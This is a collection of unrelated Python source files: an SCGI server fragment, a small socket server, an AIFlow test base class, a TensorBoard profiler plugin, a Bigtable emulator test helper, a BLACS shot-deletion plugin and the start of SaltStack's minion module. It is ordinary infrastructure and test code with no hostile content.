try: wfile.close()
except: pass
try: rfile.close()
except: pass
try: conn.shutdown(socket.SHUT_WR)
except: pass
try: conn.close()
except: pass
if env and env.get("scgi.defer"):
try:
env["scgi.defer"]()
except:
log(traceback.format_exc(), kind="error:defer")
# netstring utility functions
def _env_read(f):
size, d = f.read(16).split(b':', 1)
size = int(size)-len(d)
if size > 0:
s = f.read(size)
if not s:
raise IOError('short netstring read')
if f.read(1) != b',':
raise IOError('missing netstring terminator')
items = b"".join([d, s]).split(b'\0')[:-1]
else:
raise IOError('missing netstring size')
assert len(items) % 2 == 0, "malformed headers"
env = {}
while items:
v = items.pop()
k = items.pop()
env[k.decode()] = v.decode()
return env
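# Netstring framing sketch (illustrative): nginx sends the SCGI headers as
# '<length>:<key>\0<value>\0...<key>\0<value>\0,'. The inverse of _env_read, useful
# only for testing this parser by hand (hypothetical helper, never called):
def _env_write_example(env):
    body = b"".join(k.encode() + b"\0" + v.encode() + b"\0" for k, v in env.items())
    return str(len(body)).encode() + b":" + body + b","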
def _args_parse(env):
args = []
argd = {}
for x in env.pop('ARGS', '').split('&'):
i = x.find('=')
if i > -1:
k, x = x[:i], x[i+1:]
else:
k = None
if k:
argd[unquote(k)] = unquote(x)
#argd[k] = x
else:
if x:
args.append(unquote(x))
#args.append(x)
env['HTTP_PARAMS'] = args
env['HTTP_KWARGS'] = argd
return env
def log(msg, kind='info', begin='', end='\n'):
try:
ts = "%Y-%m-%d %H:%M:%S"
try: ts = time.strftime(ts)
except: ts = time.strftime(ts)
if __hostname__:
if __profile__:
s = '{0}{1} {2} {4}.{5}:{3}:{6} {7}{8}'.format(begin, ts, __hostname__, __version__, __appname__, __profile__, kind, msg, end)
else:
s = '{0}{1} {2} {4}:{3}:{5} {6}{7}'.format(begin, ts, __hostname__, __version__, __appname__, kind, msg, end)
else:
if __profile__:
s = '{0}{1} {3}.{4}:{2}:{5} {6}{7}'.format(begin, ts, __version__, __appname__, __profile__, kind, msg, end)
else:
s = '{0}{1} {3}:{2}:{4} {5}{6}'.format(begin, ts, __version__, __appname__, kind, msg, end)
if sys.PY3:
sys.stdout.write(s)
else:
sys.stdout.write(s.encode('utf8'))
sys.stdout.flush()
except:
pass
traceback.print_exc()
def handle_commandline():
global __profile__, __index__
if sys.PY3:
from urllib.parse import unquote
else:
from urllib import unquote
args = []
kwargs = {}
sys.stdin.close()
_argv = sys.argv[1:]
#if os.isatty(sys.stdin.fileno()):
# _argv = sys.argv[1:]
#else:
# _argv = sys.stdin.read().split(' ') + sys.argv[1:]
for x in _argv:
if sys.PY3:
pass
else:
x = x.decode('utf8')
i = x.find('=')
if i > -1:
k, x = x[:i], x[i+1:]
else:
k = None
if k:
v = unquote(x).split(',')
if len(v) > 1:
kwargs[unquote(k)] = tuple(_int(x) for x in v)
else:
kwargs[unquote(k)] = _int(v[0])
else:
if x:
v = unquote(x).split(',')
if len(v) > 1:
args.append(tuple(_int(x) for x in v))
else:
args.append(_int(v[0]))
if "profile" in kwargs:
__profile__ = kwargs.pop("profile")
if "index" in kwargs:
__index__ = kwargs.pop("index")
return args, kwargs
def _int(x):
try:
fx = float(x)
ix = int(fx)
return ix if ix == fx else fx
except:
return x
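# Worked example of the command-line handling above (hypothetical invocation):
#   python -m xmltojson addr=127.0.0.1,8080 profile=dev verbose
# yields kwargs={'addr': ('127.0.0.1', 8080), 'profile': 'dev'} and params=['verbose'],
# after which main() pops 'addr' to get the bind address and 'profile' sets __profile__.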
########################################################################
if "__main__" == __name__:
main()
|
server.py
|
import sys
import socket
import threading
server_ip_address = sys.argv[1]
server_port = int(sys.argv[2])
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def accept(client_socket):
client_socket.sendall("ok".encode('utf-8'))
return
print ("Server: " + socket.gethostname())
server_socket.bind((server_ip_address, server_port))
server_socket.listen(32000)
while 1:
(client_socket, address) = server_socket.accept()
print ("Connected client: {}".format(address))
t = threading.Thread(target = accept, args=(client_socket,))
t.start()
t.join()
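# A minimal matching client for manual testing could look like this (illustrative,
# not part of this script; it connects, reads the "ok" handshake sent by accept(),
# and closes):
#   client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   client.connect((server_ip_address, server_port))
#   print(client.recv(2).decode('utf-8'))
#   client.close()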
|
base_ete_test.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
import os
import threading
from typing import Callable
import time
from airflow.events.scheduler_events import StopSchedulerEvent
from ai_flow.api.configuration import set_project_config_file
from airflow.contrib.jobs.event_based_scheduler_job import EventBasedSchedulerJob
from airflow.executors.local_executor import LocalExecutor
from ai_flow.application_master.master import AIFlowMaster
from notification_service.client import NotificationClient
from tests import db_utils
def project_path():
return os.path.dirname(__file__)
def project_config_file():
return project_path() + '/project.yaml'
def master_config_file():
return project_path() + '/master.yaml'
def workflow_config_file():
return project_path() + '/workflow.yaml'
master = AIFlowMaster(config_file=master_config_file())
def master_port():
return master.master_config.get('master_port')
class BaseETETest(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
master.start()
@classmethod
def tearDownClass(cls) -> None:
master.stop()
def setUp(self):
master._clear_db()
db_utils.clear_db_jobs()
db_utils.clear_db_dags()
db_utils.clear_db_serialized_dags()
db_utils.clear_db_runs()
db_utils.clear_db_task_execution()
db_utils.clear_db_message()
set_project_config_file(project_config_file())
def tearDown(self):
master._clear_db()
@classmethod
def start_scheduler(cls, file_path, executor=None):
if executor is None:
executor = LocalExecutor(3)
scheduler = EventBasedSchedulerJob(
dag_directory=file_path,
server_uri="localhost:{}".format(master_port()),
executor=executor,
max_runs=-1,
refresh_dag_dir_interval=30
)
print("scheduler starting")
scheduler.run()
def run_ai_flow(self, ai_flow_function: Callable[[], str], test_function: Callable[[NotificationClient], None],
executor=None):
dag_file = ai_flow_function()
def run_test_fun():
time.sleep(5)
client = NotificationClient(server_uri="localhost:{}".format(master_port()),
default_namespace="test")
test_function(client)
client.send_event(StopSchedulerEvent(job_id=0).to_event())
t = threading.Thread(target=run_test_fun, args=())
        t.daemon = True
t.start()
self.start_scheduler(dag_file, executor)
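# A minimal usage sketch (illustrative only; the workflow builder below is
# hypothetical and must return the path of the DAG file it generates):
#
#     class MyWorkflowTest(BaseETETest):
#         def test_simple_workflow(self):
#             def build_workflow() -> str:
#                 # build an AIFlow workflow here and return its DAG file path
#                 return '/tmp/dags/my_workflow.py'
#             def check(client: NotificationClient):
#                 # wait for / assert on notification events as needed
#                 pass
#             self.run_ai_flow(build_workflow, check)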
|
plugin.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# --------------------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import multiprocessing
import os
import threading
import time
from collections import OrderedDict
import werkzeug
from tensorboard.plugins import base_plugin
from werkzeug import wrappers
from . import consts
from . import utils
from .profiler import RunLoader
from .run import Run
logger = utils.get_logger()
class TorchProfilerPlugin(base_plugin.TBPlugin):
"""TensorBoard plugin for Torch Profiler."""
plugin_name = consts.PLUGIN_NAME
def __init__(self, context):
"""Instantiates TorchProfilerPlugin.
Args:
context: A base_plugin.TBContext instance.
"""
super(TorchProfilerPlugin, self).__init__(context)
self.logdir = os.path.abspath(context.logdir)
self._is_active = None
self._is_active_initialized_event = threading.Event()
self._runs = OrderedDict()
self._runs_lock = threading.Lock()
self._queue = multiprocessing.Queue()
monitor_runs = threading.Thread(target=self.monitor_runs, name="monitor_runs", daemon=True)
monitor_runs.start()
receive_runs = threading.Thread(target=self.receive_runs, name="receive_runs", daemon=True)
receive_runs.start()
def is_active(self):
"""Returns whether there is relevant data for the plugin to process.
"""
self._is_active_initialized_event.wait()
return self._is_active
def get_plugin_apps(self):
return {
"/index.js": self.static_file_route,
"/main.js": self.static_file_route,
"/index.html": self.static_file_route,
"/overall.html": self.static_file_route,
"/trace_viewer_full.html": self.static_file_route,
"/trace_embedding.html": self.static_file_route,
"/operator.html": self.static_file_route,
"/kernel.html": self.static_file_route,
"/runs": self.runs_route,
"/views": self.views_route,
"/workers": self.workers_route,
"/overview": self.overview_route,
"/operation": self.operation_pie_route,
"/operation/table": self.operation_table_route,
"/kernel": self.kernel_pie_route,
"/kernel/table": self.kernel_table_route,
"/trace": self.trace_route
}
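    # Illustrative request flow against the routes above (query parameter
    # names are taken from the handlers below; the values are made up):
    #     GET /runs                                  -> ["resnet50", "bert"]
    #     GET /views?run=resnet50                    -> list of view display names
    #     GET /workers?run=resnet50                  -> ["worker0", "worker1"]
    #     GET /overview?run=resnet50&worker=worker0  -> overview JSON for that profile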
def frontend_metadata(self):
return base_plugin.FrontendMetadata(es_module_path="/index.js")
def monitor_runs(self):
logger.info("Monitor runs begin")
# Set _is_active quickly based on file pattern match, don't wait for data loading
self._is_active = any(self._get_run_dirs())
self._is_active_initialized_event.set()
touched = set()
while True:
try:
logger.debug("Scan run dir")
run_dirs = self._get_run_dirs()
                # Assume run directories are never deleted; trigger an async load when a new run is found
for name, run_dir in run_dirs:
if name not in touched:
logger.info("Find run %s under %s", name, run_dir)
touched.add(name)
# Use multiprocessing to avoid UI stall and reduce data parsing time
process = multiprocessing.Process(target=_load_run, args=(self._queue, name, run_dir))
process.daemon = True
process.start()
except Exception as ex:
logger.warning("Failed to scan runs. Exception=%s", ex, exc_info=True)
time.sleep(consts.MONITOR_RUN_REFRESH_INTERNAL_IN_SECONDS)
def receive_runs(self):
while True:
run = self._queue.get()
if run is None:
continue
logger.info("Add run %s", run.name)
with self._runs_lock:
is_new = run.name not in self._runs
self._runs[run.name] = run
if is_new:
self._runs = OrderedDict(sorted(self._runs.items()))
# Update is_active
if not self._is_active:
self._is_active = True
def _get_run_dirs(self):
"""Scan logdir, find PyTorch Profiler run directories.
A directory is considered to be a run if it contains 1 or more *.pt.trace.json[.gz].
E.g. there are 2 runs: run1, run2
/run1
/[worker1].pt.trace.json.gz
/[worker2].pt.trace.json.gz
/run2
/[worker1].pt.trace.json
"""
for root, _, files in os.walk(self.logdir):
for file in files:
if utils.is_chrome_trace_file(file):
run_dir = os.path.abspath(root)
if run_dir == self.logdir:
name = os.path.basename(run_dir)
else:
name = os.path.relpath(run_dir, self.logdir)
yield name, run_dir
break
def get_run(self, name) -> Run:
with self._runs_lock:
return self._runs.get(name, None)
@wrappers.Request.application
def runs_route(self, request):
with self._runs_lock:
names = list(self._runs.keys())
return self.respond_as_json(names)
@wrappers.Request.application
def views_route(self, request):
name = request.args.get("run")
run = self.get_run(name)
views = sorted(run.views, key=lambda x: x.id)
views_list = []
for view in views:
views_list.append(view.display_name)
return self.respond_as_json(views_list)
@wrappers.Request.application
def workers_route(self, request):
name = request.args.get("run")
run = self.get_run(name)
return self.respond_as_json(run.workers)
@wrappers.Request.application
def overview_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
run = self.get_run(name)
profile = run.get_profile(worker)
data = profile.overview
data["environments"] = [{"title": "Number of Worker(s)", "value": str(len(run.workers))},
{"title": "Device Type", "value": "GPU" if profile.is_gpu_used else "CPU"}]
if profile.is_gpu_used:
data["environments"].append({"title": "Number of Device(s)", "value": "1"})
return self.respond_as_json(data)
@wrappers.Request.application
def operation_pie_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
group_by = request.args.get("group_by")
run = self.get_run(name)
profile = run.get_profile(worker)
if group_by == "OperationAndInputShape":
return self.respond_as_json(profile.operation_pie_by_name_input)
else:
return self.respond_as_json(profile.operation_pie_by_name)
@wrappers.Request.application
def operation_table_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
group_by = request.args.get("group_by")
run = self.get_run(name)
profile = run.get_profile(worker)
if group_by == "OperationAndInputShape":
return self.respond_as_json(profile.operation_table_by_name_input)
else:
return self.respond_as_json(profile.operation_table_by_name)
@wrappers.Request.application
def kernel_pie_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
run = self.get_run(name)
profile = run.get_profile(worker)
return self.respond_as_json(profile.kernel_pie)
@wrappers.Request.application
def kernel_table_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
group_by = request.args.get("group_by")
run = self.get_run(name)
profile = run.get_profile(worker)
if group_by == "Kernel":
return self.respond_as_json(profile.kernel_table)
else:
return self.respond_as_json(profile.kernel_op_table)
@wrappers.Request.application
def trace_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
run = self.get_run(name)
profile = run.get_profile(worker)
        with open(profile.trace_file_path, 'rb') as f:
            raw_data = f.read()
        headers = []
        if profile.trace_file_path.endswith('.gz'):
            headers.append(('Content-Encoding', 'gzip'))
        return werkzeug.Response(raw_data, content_type="application/json", headers=headers)
@wrappers.Request.application
def static_file_route(self, request):
filename = os.path.basename(request.path)
extension = os.path.splitext(filename)[1]
if extension == '.html':
mimetype = 'text/html'
elif extension == '.css':
mimetype = 'text/css'
elif extension == '.js':
mimetype = 'application/javascript'
else:
mimetype = 'application/octet-stream'
filepath = os.path.join(os.path.dirname(__file__), 'static', filename)
try:
with open(filepath, 'rb') as infile:
contents = infile.read()
except IOError:
            return werkzeug.Response('404 Not Found', status=404, content_type='text/plain')
return werkzeug.Response(
contents, content_type=mimetype
)
@staticmethod
def respond_as_json(obj):
content = json.dumps(obj)
return werkzeug.Response(content, content_type="application/json")
def _load_run(queue, name, run_dir):
import absl.logging
absl.logging.use_absl_handler()
try:
logger.info("Load run %s", name)
# Currently, assume run data is immutable, so just load once
loader = RunLoader(name, run_dir)
run = loader.load()
logger.info("Run %s loaded", name)
queue.put(run)
except Exception as ex:
logger.warning("Failed to load run %s. Exception=%s", ex, name, exc_info=True)
|
bigtable_emulator.py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# disable module docstring for tests
# pylint: disable=C0114
# disable class docstring for tests
# pylint: disable=C0115
# disable warning for access to protected members
# pylint: disable=W0212
# disable warning for not using 'with' for resource-allocating operations
# pylint: disable=R1732
import os
import subprocess
import re
import tensorflow as tf
from threading import Thread
from typing import List
CBT_EMULATOR_SEARCH_PATHS = [
"/usr/lib/google-cloud-sdk/platform/bigtable-emulator/cbtemulator",
"/usr/local/google-cloud-sdk/platform/bigtable-emulator/cbtemulator",
"/v/google-cloud-sdk/platform/bigtable-emulator/cbtemulator",
"cbtemulator",
]
CBT_CLI_SEARCH_PATHS = [
"/usr/local/google-cloud-sdk/bin/cbt",
"/usr/bin/cbt",
"/v/google-cloud-sdk/bin/cbt",
"cbt",
]
CBT_EMULATOR_PATH_ENV_VAR = "CBT_EMULATOR_PATH"
CBT_CLI_PATH_ENV_VAR = "CBT_CLI_PATH"
def _get_cbt_binary_path(env_var_name, search_paths, description):
res = os.environ.get(env_var_name)
if res is not None:
if not os.path.isfile(res):
raise OSError(
f"{description} specified in the {env_var_name} "
"environment variable does not exist"
)
return res
for candidate in search_paths:
if os.path.isfile(candidate):
return candidate
raise OSError(f"Could not find {description}")
def _get_cbt_emulator_path():
return _get_cbt_binary_path(
CBT_EMULATOR_PATH_ENV_VAR, CBT_EMULATOR_SEARCH_PATHS, "cbt emulator"
)
def _get_cbt_cli_path():
return _get_cbt_binary_path(CBT_CLI_PATH_ENV_VAR, CBT_CLI_SEARCH_PATHS, "cbt cli")
def _extract_emulator_addr_from_output(emulator_output):
while True:
line = emulator_output.readline().decode()
if not line:
raise RuntimeError("CBT emulator stopped producing output")
if "running on" in line:
words = line.split()
for word in words:
if re.fullmatch("[a-z.0-9]+:[0-9]+", word):
return word
raise RuntimeError(f"Failed to find CBT emulator in the line {line}")
class BigtableEmulator:
def __init__(self):
emulator_path = _get_cbt_emulator_path()
self._emulator = subprocess.Popen(
[emulator_path, "-port", "0"],
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=0,
)
out = self._emulator.stdout
self._emulator_addr = _extract_emulator_addr_from_output(out)
self._output_reading_thread = Thread(target=out.read)
self._output_reading_thread.start()
def get_addr(self):
return self._emulator_addr
def create_table(
self, project_id, instance_id, table_id, column_families, splits=None
):
cli_path = _get_cbt_cli_path()
cmd = [
cli_path,
"-project",
project_id,
"-instance",
instance_id,
"createtable",
table_id,
"families=" + ",".join([f"{fam}:never" for fam in column_families]),
]
if splits:
cmd.append("splits=" + ",".join(splits))
subprocess.check_output(cmd)
def write_tensor(
self,
project_id,
instance_id,
table_id,
tensor: tf.Tensor,
rows: List[str],
columns: List[str],
):
assert len(tensor.shape) == 2
assert len(rows) == tensor.shape[0]
assert len(columns) == tensor.shape[1]
cli_path = _get_cbt_cli_path()
for i, row in enumerate(tensor):
for j, value in enumerate(row):
cmd = [
cli_path,
"-project",
project_id,
"-instance",
instance_id,
"set",
table_id,
rows[i],
f"{columns[j]}={value.numpy().decode()}",
]
subprocess.check_output(cmd)
def stop(self):
self._emulator.terminate()
self._output_reading_thread.join()
self._emulator.stdout.close()
self._emulator.wait()
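# A minimal usage sketch (illustrative only; project, instance, table and
# column-family names are made up, and pointing the cbt CLI at the emulator
# via BIGTABLE_EMULATOR_HOST is an assumption about how this class is used):
#
#     emulator = BigtableEmulator()
#     os.environ["BIGTABLE_EMULATOR_HOST"] = emulator.get_addr()
#     emulator.create_table("test-project", "test-instance", "t1", ["fam1"])
#     emulator.write_tensor(
#         "test-project", "test-instance", "t1",
#         tf.constant([["a", "b"], ["c", "d"]]),
#         rows=["row1", "row2"], columns=["fam1:c1", "fam1:c2"])
#     emulator.stop()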
|
__init__.py
|
#####################################################################
# #
# /plugins/delete_repeated_shots/__init__.py #
# #
# Copyright 2017, JQI #
# #
# This file is part of the program BLACS, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
from labscript_utils import PY2
if PY2:
from Queue import Queue
else:
from queue import Queue
import logging
import os
import subprocess
import threading
import sys
from qtutils import UiLoader
from labscript_utils.shared_drive import path_to_agnostic
import zprocess.locking
from blacs.plugins import PLUGINS_DIR
name = "Delete repeated shots"
module = "delete_repeated_shots" # should be folder name
logger = logging.getLogger('BLACS.plugin.%s'%module)
KEEP_ALL_SHOTS = 0
class Plugin(object):
def __init__(self, initial_settings):
self.menu = None
self.notifications = {}
self.initial_settings = initial_settings
self.BLACS = None
self.ui = None
self.n_shots_to_keep = initial_settings.get('n_shots_to_keep', KEEP_ALL_SHOTS)
self.delete_queue = initial_settings.get('delete_queue', [])
self.event_queue = Queue()
self.delete_queue_lock = threading.Lock()
self.mainloop_thread = threading.Thread(target=self.mainloop)
self.mainloop_thread.daemon = True
self.mainloop_thread.start()
def plugin_setup_complete(self, BLACS):
self.BLACS = BLACS
# Add our controls to the BLACS UI:
self.ui = UiLoader().load(os.path.join(PLUGINS_DIR, module, 'controls.ui'))
BLACS['ui'].queue_controls_frame.layout().addWidget(self.ui)
# Restore settings to the GUI controls:
self.ui.spinBox.setValue(self.n_shots_to_keep)
# Connect signals:
self.ui.spinBox.valueChanged.connect(self.on_spinbox_value_changed)
self.ui.reset_button.clicked.connect(self.on_reset_button_clicked)
BLACS['ui'].queue_repeat_button.toggled.connect(self.ui.setEnabled)
# Our control is only enabled when repeat mode is active:
self.ui.setEnabled(BLACS['ui'].queue_repeat_button.isChecked())
def on_spinbox_value_changed(self, value):
with self.delete_queue_lock:
self.n_shots_to_keep = value
# If the user reduces the number of shots to keep, but we had a
# larger list of shots awaiting deletion, remove shots from the
# deletion queue (without deleting them) until the queue is the
# same size as the number of shots we are now keeping. This means
# that if we set to keep 100 shots, and then we go ahead and run a
# hundred shots, if we then set it to keep 5 shots it won't delete
# the 95 oldest shots in the queue. Rather it will only delete the
# most recent 5 (and not immediately - over the next 5 shots).
while len(self.delete_queue) > self.n_shots_to_keep:
self.delete_queue.pop(0)
def on_reset_button_clicked(self):
self.ui.spinBox.setValue(KEEP_ALL_SHOTS)
def get_save_data(self):
return {'n_shots_to_keep': self.n_shots_to_keep,
'delete_queue': self.delete_queue}
def get_callbacks(self):
return {'shot_complete': self.on_shot_complete}
def on_shot_complete(self, h5_filepath):
# If we're keeping all shots, then there's nothing to do here:
if self.n_shots_to_keep == KEEP_ALL_SHOTS:
return
# Is the file a repeated shot?
basename, ext = os.path.splitext(os.path.basename(h5_filepath))
if '_rep' in basename and ext == '.h5':
repno = basename.split('_rep')[-1]
try:
int(repno)
except ValueError:
# not a rep:
return
else:
# Yes, it is a rep. Queue it for deletion:
self.delete_queue.append(h5_filepath)
self.event_queue.put('shot complete')
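    # Illustrative behaviour of on_shot_complete with a nonzero n_shots_to_keep
    # (filenames are made up):
    #     on_shot_complete('/data/seq_rep00042.h5') -> queued ('_rep' plus an integer suffix)
    #     on_shot_complete('/data/seq.h5')          -> ignored (no '_rep' in the name)
    #     on_shot_complete('/data/seq_repfoo.h5')   -> ignored (suffix is not an integer)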
def mainloop(self):
        # We delete shots in a separate thread so that the shot queue is not
        # slowed down while we wait on network communication to acquire the
        # file lock.
while True:
try:
event = self.event_queue.get()
if event == 'close':
break
elif event == 'shot complete':
while len(self.delete_queue) > self.n_shots_to_keep:
with self.delete_queue_lock:
h5_filepath = self.delete_queue.pop(0)
# Acquire a lock on the file so that we don't
# delete it whilst someone else has it open:
with zprocess.locking.Lock(path_to_agnostic(h5_filepath)):
try:
os.unlink(h5_filepath)
logger.info("Deleted repeated shot file %s" % h5_filepath)
except OSError:
logger.exception("Couldn't delete shot file %s" % h5_filepath)
else:
raise ValueError(event)
except Exception:
logger.exception("Exception in repeated shot deletion loop, ignoring.")
def close(self):
self.event_queue.put('close')
self.mainloop_thread.join()
# The rest of these are boilerplate:
def get_menu_class(self):
return None
def get_notification_classes(self):
return []
def get_setting_classes(self):
return []
def set_menu_instance(self, menu):
self.menu = menu
def set_notification_instances(self, notifications):
self.notifications = notifications
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import print_function
import logging
import getpass
import multiprocessing
import fnmatch
import copy
import os
import hashlib
import re
import types
import threading
import time
import traceback
import sys
import signal
import errno
from random import randint, shuffle
import salt
# Import third party libs
try:
import zmq
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
import yaml
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
# Import salt libs
from salt.exceptions import (
AuthenticationError, CommandExecutionError, CommandNotFoundError,
SaltInvocationError, SaltReqTimeoutError, SaltClientError,
SaltSystemExit
)
import salt.client
import salt.crypt
import salt.config
import salt.loader
import salt.pillar
import salt.utils
import salt.payload
import salt.utils.schedule
import salt.utils.event
from salt._compat import string_types
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
import salt.syspaths
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
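#
# A minimal usage sketch of the classes below (illustrative only; the config
# path is an assumption):
#
#     import salt.config
#     opts = salt.config.minion_config('/etc/salt/minion')
#     minion = Minion(opts)   # resolves the master, authenticates, loads modules
#     minion.tune_in()        # blocks, receiving and executing publications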
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if opts.get('file_client', 'remote') == 'local' and check_dns:
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: {0} not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.warn(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
        err = 'Master address: {0} could not be resolved. Invalid or unresolvable address.'.format(
opts.get('master', 'Unknown'))
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
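# Illustrative shape of the dict returned by resolve_dns (values are made up):
#     {'master_ip': '10.0.0.5', 'master_uri': 'tcp://10.0.0.5:4506'}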
def get_proc_dir(cachedir):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
'''
fn_ = os.path.join(cachedir, 'proc')
if not os.path.isdir(fn_):
# proc_dir is not present, create it
os.makedirs(fn_)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Detect the args and kwargs that need to be passed to a function call,
and yamlify all arguments and key-word argument values if:
- they are strings
- they do not contain '\n'
If yamlify results in a dict, and the original argument or kwarg value
did not start with a "{", then keep the original string value.
This is to prevent things like 'echo "Hello: world"' to be parsed as
dictionaries.
'''
argspec = salt.utils.get_function_argspec(func)
_args = []
kwargs = {}
invalid_kwargs = []
for arg in args:
# support old yamlify syntax
if isinstance(arg, string_types):
salt.utils.warn_until(
'Boron',
'This minion received a job where kwargs were passed as '
'string\'d args, which has been deprecated. This functionality will '
'be removed in Salt Boron.'
)
arg_name, arg_value = salt.utils.parse_kwarg(arg)
if arg_name:
if argspec.keywords or arg_name in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
kwargs[arg_name] = yamlify_arg(arg_value)
continue
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append(arg)
        # if the arg is a dict with __kwarg__ == True, then it's a kwarg
elif isinstance(arg, dict) and arg.get('__kwarg__') is True:
for key, val in arg.iteritems():
if key == '__kwarg__':
continue
kwargs[key] = val
continue
_args.append(yamlify_arg(arg))
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in data.items():
kwargs['__pub_{0}'.format(key)] = val
if invalid_kwargs:
raise SaltInvocationError(
'The following keyword arguments are not valid: {0}'
.format(', '.join(invalid_kwargs))
)
return _args, kwargs
def yamlify_arg(arg):
'''
yaml.safe_load the arg unless it has a newline in it.
'''
if not isinstance(arg, string_types):
return arg
try:
original_arg = str(arg)
if isinstance(arg, string_types):
if '#' in arg:
# Don't yamlify this argument or the '#' and everything after
# it will be interpreted as a comment.
return arg
if '\n' not in arg:
arg = yaml.safe_load(arg)
if isinstance(arg, dict):
# dicts must be wrapped in curly braces
if (isinstance(original_arg, string_types) and
not original_arg.startswith('{')):
return original_arg
else:
return arg
elif isinstance(arg, (int, list, string_types)):
# yaml.safe_load will load '|' as '', don't let it do that.
if arg == '' and original_arg in ('|',):
return original_arg
# yaml.safe_load will treat '#' as a comment, so a value of '#'
# will become None. Keep this value from being stomped as well.
elif arg is None and original_arg.strip().startswith('#'):
return original_arg
else:
return arg
else:
# we don't support this type
return original_arg
except Exception:
# In case anything goes wrong...
return original_arg
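# Illustrative behaviour of yamlify_arg (a sketch, not executed here):
#     yamlify_arg('42')           -> 42               ('42' yaml-loads to an int)
#     yamlify_arg('Hello: world') -> 'Hello: world'   (a dict result without a leading '{' keeps the string)
#     yamlify_arg('# note')       -> '# note'         (arguments containing '#' are never yamlified)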
class SMinion(object):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
self.opts = opts
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if self.opts.get('file_client', 'remote') == 'remote':
if isinstance(self.opts['master'], list):
masters = self.opts['master']
if self.opts['random_master'] is True:
shuffle(masters)
self.opts['_safe_auth'] = False
for master in masters:
self.opts['master'] = master
self.opts.update(resolve_dns(opts))
try:
self.gen_modules()
break
except SaltClientError:
log.warning(('Attempted to authenticate with master '
'{0} and failed'.format(master)))
continue
else:
if self.opts['random_master'] is True:
log.warning('random_master is True but there is only one master specified. Ignoring.')
self.opts.update(resolve_dns(opts))
self.gen_modules()
else:
self.gen_modules()
def gen_modules(self):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
self.functions = salt.loader.minion_mods(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.states = salt.loader.states(self.opts, self.functions)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
def _init_context_and_poller(self):
self.context = zmq.Context()
self.poller = zmq.Poller()
def _prepare_minion_event_system(self):
# Prepare the minion event system
#
# Start with the publish socket
